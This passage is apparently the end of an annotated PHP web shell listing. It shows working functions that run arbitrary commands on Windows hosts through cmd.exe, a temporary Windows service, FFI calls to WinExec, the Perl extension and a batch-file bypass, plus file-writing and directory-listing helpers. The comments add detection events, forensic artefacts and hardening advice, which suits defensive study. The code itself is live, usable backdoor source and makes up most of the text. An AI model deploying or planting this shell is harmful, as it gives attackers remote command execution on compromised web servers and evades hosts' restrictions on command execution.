   * DeleteFile() and returns the content.
   * Forensic artefact: NJ-prefixed files appearing briefly in that directory.
   * Detection: cmd.exe started by the web server or PHP worker process.
   */
  1057. function winshell($command) {
  1058.     $name=whereistmP()."\\".uniqid('NJ');
  1059.     win_shell_execute('cmd.exe','',"/C $command >\"$name\"");
  1060.     sleep(1);
  1061.     $exec=file_get_contents($name);
  1062.     DeleteFile($name);
  1063.     return $exec;
  1064. }
  /**
   * srvshell: registers a Windows service with a random NJ-prefixed name whose binary path
   * is cmd.exe (taken from $_SERVER['ComSpec'], else a hard-coded path on drive d:) and
   * whose parameters run $command with output redirected to an NJ-prefixed file. It then
   * starts, stops and deletes the service, polls once per second until the output file
   * exists (no timeout), reads it, deletes it and returns the content.
   * Creating a service needs administrative rights, so running the web server under a
   * low-privilege account denies this branch.
   * Detection: service-installation events (System log event 7045, Security log event
   * 4697) for a short-lived service whose image path is cmd.exe.
   */
  1065. function srvshell($command) {
  1066.     $name=whereistmP()."\\".uniqid('NJ');
  1067.     $n=uniqid('NJ');
  1068.     $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
  1069.     win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
  1070.     win32_start_service($n);
  1071.     win32_stop_service($n);
  1072.     win32_delete_service($n);
  1073.     while(!file_exists($name))sleep(1);
  1074.     $exec=file_get_contents($name);
  1075.     DeleteFile($name);
  1076.     return $exec;
  1077. }
  /**
   * ffishell: declares WinExec from kernel32.dll through the `ffi` class and calls it with
   * "cmd.exe /c <command>" redirected to an NJ-prefixed file, passing 0 as the show-window
   * argument. It then polls once per second until the file exists (no timeout), reads it,
   * deletes it and returns the content.
   * The `new ffi("[lib=...] ...")` form matches the old PECL ffi extension rather than the
   * FFI class bundled since PHP 7.4 (inferred from the syntax).
   * Hardening: leave foreign-function extensions unloaded on web-facing PHP, or keep
   * ffi.enable at its restrictive default.
   */
  1078. function ffishell($command) {
  1079.     $name=whereistmP()."\\".uniqid('NJ');
  1080.     $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
  1081.     $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
  1082.     while(!file_exists($name))sleep(1);
  1083.     $exec=file_get_contents($name);
  1084.     DeleteFile($name);
  1085.     return $exec;
  1086. }
  /**
   * perlshell: instantiates the `perl` class (a PECL extension, not part of core PHP),
   * evaluates a Perl system() call with $command spliced between single quotes, and
   * returns whatever was written to PHP's output buffer in the meantime.
   */
  1087. function perlshell($command) {
  1088.     $perl=new perl();
  1089.     ob_start();
  1090.     $perl->eval("system('".$command."')");
  1091.     $exec=ob_get_contents();
  1092.     ob_end_clean();
  1093.     return $exec;
  1094. }
  /**
   * slashBypass: writes cmd.bat in the current directory containing the command with its
   * output redirected to sy3.txt, launches it with exec("\start cmd.bat"), then reads
   * sy3.txt, deletes it and returns the content. cmd.bat itself is not removed.
   * Forensic artefacts: cmd.bat and sy3.txt next to the script.
   */
  1095. function slashBypass($cmd) {
  1096.     GenerateFile("cmd.bat","$cmd>sy3.txt"."\r\n exit");
  1097.     exec("\start cmd.bat");
  1098.     $content = file_get_contents('sy3.txt');
  1099.     unlink('sy3.txt');
  1100.     return $content;
  1101. }
  /**
   * GenerateFile: opens $name with mode "w+" (truncating it) and writes $content using the
   * first available of fwrite(), fputs() or file_put_contents().
   * Returns true after a successful write, false when the open or the write fails (the
   * handle is not closed on a failed write, and a zero-byte write also counts as failure),
   * and nothing at all when fopen() or fclose() is unavailable.
   * The file_put_contents() fallback is given the open handle rather than the file name.
   * This is the shell's generic file-drop primitive; a web root that the server account
   * cannot write to, plus file-integrity monitoring, addresses it.
   */
  1102. function GenerateFile($name,$content) {
  1103.     if(function_exists('fopen') && function_exists('fclose')) {
  1104.         $file = fopen($name,"w+");
  1105.         if($file) {
  1106.             if(function_exists('fwrite')){$writeFile = fwrite($file,$content); }   
  1107.             else if (function_exists('fputs')){$writeFile = fputs($file,$content); }
  1108.             else if (function_exists('file_put_contents')){$writeFile = file_put_contents($file,$content);}
  1109.             if(!$writeFile){return false;}
  1110.         }
  1111.         else{return false;}fclose($file);return true;
  1112.     }
  1113. }
  /**
   * ScanDirs: directory listing. When $dir_mode is "cmd" it shells out through Exe()
   * ("dir" on Windows, "ls -lia" otherwise), which echoes directly, and then returns an
   * unset $result. Otherwise it reads $dir with opendir()/readdir() and returns a
   * plain-text table of permissions, size, ctime, owner/group, readable/writable flags,
   * type and name.
   * The stat calls receive the bare entry name, so they resolve against the process's
   * working directory rather than $dir unless the script changes directory elsewhere.
   * The loop uses a loose != false test, the directory handle is never closed, and entry
   * names are not HTML-escaped.
   */
  1114. function ScanDirs() {
  1115.     global $os; global $dir;global $safeMode;global $dir_mode;
  1116.     if($dir_mode == "cmd"){if($os == "Windows"){Exe('dir');}else{ Exe('ls -lia');}}
  1117.     else {
  1118.         $result .= "Perms   Size    Time        Owner/Group R/W Type    File
  1119. -----------------------------------------------------------------------------
  1120. ";
  1121.         $handel = opendir($dir);
  1122.         while(($file = readdir($handel))!= false)
  1123.         {
  1124.             $size = filesize($file);
  1125.             if(filetype($file) == "dir"){$type = "<DIR>";}else {$type = "<FILE>";}
  1126.             if(fileowner($file)){$owner = fileowner($file);}else{$owner = "NONE";}
  1127.             if(filegroup($file)){$group = filegroup($file);}else{$group = "NONE";}
  1128.             $perms = fileperms($file);
  1129.             $time = date("y/m/d", filectime($file));
  1130.             if(is_writable($file)){$isWritable = "Y";}else{$isWritable = "N";}
  1131.             if(is_readable($file)){$isReadable = "Y";}else{$isReadable = "N";}
  1132.             $result .= $perms." ".$size."   ".$time."   ".$owner."/".$group."   ".$isReadable."/".$isWritable." ".$type."   ".$file."
  1133. ";
  1134.         }
  1135.     }
  1136.     return $result;
  1137. }
  // footer() echoes its markup itself and has no return value, so this echo adds nothing to the output.
  1138. echo footer();
  1139. ?>